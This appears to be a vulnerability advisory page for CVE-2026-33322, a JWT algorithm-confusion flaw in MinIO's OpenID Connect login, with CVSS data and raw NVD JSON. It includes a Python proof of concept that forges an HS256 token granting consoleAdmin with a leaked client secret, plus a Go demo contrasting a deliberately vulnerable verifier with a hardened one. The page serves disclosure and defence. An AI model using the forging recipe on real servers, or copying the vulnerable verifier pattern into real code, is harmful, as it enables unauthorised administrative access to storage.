Security Vulnerability Report
CVE-2026-33322 CVSS 9.8 CRITICAL


Published: 2026-03-24 20:16:28
Last Modified: 2026-04-08 19:05:01

Description

MinIO is a high-performance object storage system. From RELEASE.2022-11-08T05-27-07Z to before RELEASE.2026-03-17T21-25-16Z, a JWT algorithm confusion vulnerability in MinIO's OpenID Connect authentication allows an attacker who knows the OIDC ClientSecret to forge arbitrary identity tokens and obtain S3 credentials with any policy, including consoleAdmin. This issue has been patched in RELEASE.2026-03-17T21-25-16Z. The precondition is the ClientSecret, not any MinIO credential: until the upgrade is applied, anyone holding that secret (a leaked config file, a CI variable, a shared relying-party registration) can mint a consoleAdmin token, so the secret should be treated as equivalent to a MinIO root credential.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 (secondary score from the raw record below)
9.2 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Attack Requirements is PRESENT, which records the precondition that the attacker already holds the OIDC ClientSecret; the 3.1 vector has no field for that precondition, which is why the two scores differ.

Weakness
CWE-287 (Improper Authentication)

Configurations (Affected Products)

cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* - VULNERABLE
MinIO from RELEASE.2022-11-08T05-27-07Z up to, but not including, RELEASE.2026-03-17T21-25-16Z

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import jwt
import time

# PoC for CVE-2026-33322: MinIO JWT Algorithm Confusion
# Description: Forge a JWT using the leaked OIDC ClientSecret via HS256.
# Prerequisite: Attacker knows the 'client_secret' used in MinIO's OIDC config.

client_secret = "LEAKED_OIDC_CLIENT_SECRET"

# Malicious payload claiming admin privileges. MinIO attaches the policy named in
# the claim configured by claim_name (default "policy"), so consoleAdmin grants
# full administrative rights on the resulting STS credentials.
payload = {
    "sub": "attacker",
    "act": "admin",
    "policy": "consoleAdmin",  # Highest privilege
    "exp": int(time.time()) + 3600,
    "iat": int(time.time()),
}

# Sign the token with HS256 (HMAC) using the client secret. The flaw is that a
# server expecting an RS256 (RSA) token from the provider also accepts an HS256
# token and verifies it directly with the client secret, a value the attacker
# already holds, so no provider signature is ever needed.
forged_token = jwt.encode(payload, client_secret, algorithm="HS256")

print(f"[+] Forged JWT Token: {forged_token}")
print("[+] Send this token to the MinIO STS endpoint to obtain S3 credentials.")
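The vulnerable and hardened verifiers side by side, as an added example written for this page; it is not MinIO's code and its function names (ForgeHS256, SignRS256, Verify, ConfusedKeys, PinnedKeys) are this example's own. It models the pattern the advisory describes in a minimal compact-JWS verifier built only from the Go standard library: the key used to check the signature is selected by the token's own alg header, and the client secret is handed out for HS256, so anyone holding that secret can mint a token the verifier accepts as if the provider had signed it. The hardened key table knows only the provider's RSA key, so an HS256 header is refused before any signature is examined. The RSA key, the client secret string and the claims are constructed inline for the demonstration.

```go
package main

import (
	"crypto"
	"crypto/hmac"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
)

var b64 = base64.RawURLEncoding // JWS compact serialization: base64url, no padding
// signingInput is "base64url(header).base64url(claims)", the bytes a JWS signature covers.
func signingInput(alg string, claims map[string]string) string {
	h, _ := json.Marshal(map[string]string{"alg": alg, "typ": "JWT"}) // cannot fail for string maps
	c, _ := json.Marshal(claims)
	return b64.EncodeToString(h) + "." + b64.EncodeToString(c)
}

// SignRS256 issues a token the way a genuine OIDC provider does: RS256 with its private key.
func SignRS256(priv *rsa.PrivateKey, claims map[string]string) (string, error) {
	in := signingInput("RS256", claims)
	sum := sha256.Sum256([]byte(in))
	sig, err := rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, sum[:])
	if err != nil {
		return "", err
	}
	return in + "." + b64.EncodeToString(sig), nil
}

// ForgeHS256 is the attacker's move: an HMAC token keyed with the leaked client secret.
func ForgeHS256(clientSecret string, claims map[string]string) string {
	in := signingInput("HS256", claims)
	m := hmac.New(sha256.New, []byte(clientSecret))
	m.Write([]byte(in))
	return in + "." + b64.EncodeToString(m.Sum(nil))
}

// ConfusedKeys is the flawed key table: the token's own alg picks the key, and the
// client secret is handed out for HS256, so a forged HMAC token verifies cleanly.
func ConfusedKeys(pub *rsa.PublicKey, clientSecret string) map[string]any {
	return map[string]any{"RS256": pub, "HS256": []byte(clientSecret)}
}
// PinnedKeys is the hardened table: only the provider's asymmetric key, only RS256.
func PinnedKeys(pub *rsa.PublicKey) map[string]any {
	return map[string]any{"RS256": pub}
}

// Verify checks a compact JWS with the key the table holds for the header's alg and returns the claims.
func Verify(tok string, keys map[string]any) (map[string]any, error) {
	p := strings.Split(tok, ".")
	if len(p) != 3 {
		return nil, fmt.Errorf("malformed compact JWS")
	}
	var hdr map[string]string
	var claims map[string]any
	for i, dst := range []any{&hdr, &claims} {
		raw, err := b64.DecodeString(p[i])
		if err == nil {
			err = json.Unmarshal(raw, dst)
		}
		if err != nil {
			return nil, err
		}
	}
	sig, err := b64.DecodeString(p[2])
	if err != nil {
		return nil, err
	}
	in := p[0] + "." + p[1]
	switch k := keys[hdr["alg"]].(type) {
	case *rsa.PublicKey:
		sum := sha256.Sum256([]byte(in))
		err = rsa.VerifyPKCS1v15(k, crypto.SHA256, sum[:], sig)
	case []byte:
		m := hmac.New(sha256.New, k)
		m.Write([]byte(in))
		if !hmac.Equal(m.Sum(nil), sig) {
			err = fmt.Errorf("HMAC mismatch")
		}
	default: // alg absent from the table: reject before touching the signature
		err = fmt.Errorf("alg %q not permitted for this issuer", hdr["alg"])
	}
	if err != nil {
		return nil, err
	}
	return claims, nil
}

func main() {
	priv, _ := rsa.GenerateKey(rand.Reader, 2048) // stands in for the OIDC provider's signing key
	const secret = "constructed-client-secret"     // stands in for a leaked OIDC ClientSecret
	forged := ForgeHS256(secret, map[string]string{"sub": "attacker", "policy": "consoleAdmin"})
	_, confusedErr := Verify(forged, ConfusedKeys(&priv.PublicKey, secret))
	_, pinnedErr := Verify(forged, PinnedKeys(&priv.PublicKey))
	fmt.Printf("forged HS256 token: confused verifier err=%v, pinned verifier err=%v\n", confusedErr, pinnedErr)
}
```

Run with go run; the confused table reports no error for the forged token while the pinned table refuses it. The example deliberately stops at signature checking: a real OIDC verifier must additionally pin the issuer, audience, expiry and kid against the provider's published JWKS, and the only key material it should ever hold for signature checks is that JWKS, never the client secret.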

References

https://github.com/minio/minio/security/advisories/GHSA-5cx5-wh4m-82fh (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33322", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:27.857", "lastModified": "2026-04-08T19:05:00.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MinIO is a high-performance object storage system. From RELEASE.2022-11-08T05-27-07Z to before RELEASE.2026-03-17T21-25-16Z, a JWT algorithm confusion vulnerability in MinIO's OpenID Connect authentication allows an attacker who knows the OIDC ClientSecret to forge arbitrary identity tokens and obtain S3 credentials with any policy, including consoleAdmin. This issue has been patched in RELEASE.2026-03-17T21-25-16Z."}, {"lang": "es", "value": "MinIO es un sistema de almacenamiento de objetos de alto rendimiento. Desde RELEASE.2022-11-08T05-27-07Z hasta antes de RELEASE.2026-03-17T21-25-16Z, una vulnerabilidad de confusión de algoritmo JWT en la autenticación OpenID Connect de MinIO permite a un atacante que conoce el OIDC ClientSecret forjar tokens de identidad arbitrarios y obtener credenciales S3 con cualquier política, incluyendo consoleAdmin. Este problema ha sido parcheado en RELEASE.2026-03-17T21-25-16Z."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*", "versionStartIncluding": "2022-11-08t05-27-07z", "versionEndExcluding": "2026-03-17t21-25-16z", "matchCriteriaId": "EF0498AE-5809-41DD-A2B5-FCFF799B18F2"}]}]}], "references": [{"url": "https://github.com/minio/minio/security/advisories/GHSA-5cx5-wh4m-82fh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}